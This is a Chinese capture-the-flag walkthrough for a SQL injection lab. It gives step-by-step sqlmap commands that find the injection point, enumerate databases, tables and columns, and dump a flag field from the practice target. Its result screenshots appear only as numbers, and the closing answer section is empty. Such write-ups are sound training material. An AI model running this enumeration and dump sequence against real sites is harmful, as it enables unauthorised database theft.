题目

图片描述
题目
进行简单的注入测试，可发现有注入点！

然后使用sqlmap

1. 第一步判断是否是注入点

sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1"

如果URL存在注入点，将会显示出Web容器、数据库版本信息

结果如下： 1

2. 第二步获取数据库

sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs

使用 --dbs参数读取数据库，结果如下

2

3. 第三步查看当前应用程序所用数据库。

sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db

使用 --current -db参数列出当前应用程序所使用的的数据库，结果如下：

3

4. 第四步 列出指定数据库的所有表

sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --table -D "my_db"

(引号可省略)

4

5. 第五步 读取指定表中的字段名称。

sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --columns -T "thiskey" -D "my_db"

使用 --columns参数列取字段名，结果如下

5

6. 第六步 读取指定字段内容；

sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dump -C "k0y" -T "thiskey" -D "my_db"

--dump参数意为转存为数据，-C参数指定字段名称，-T指定表名（），-D指定数据库名称。

6

在读取数据后，SQLMap将会把读取的数据转存到SQLMap/output/目录下，文件以"Table.cvs"保存

答案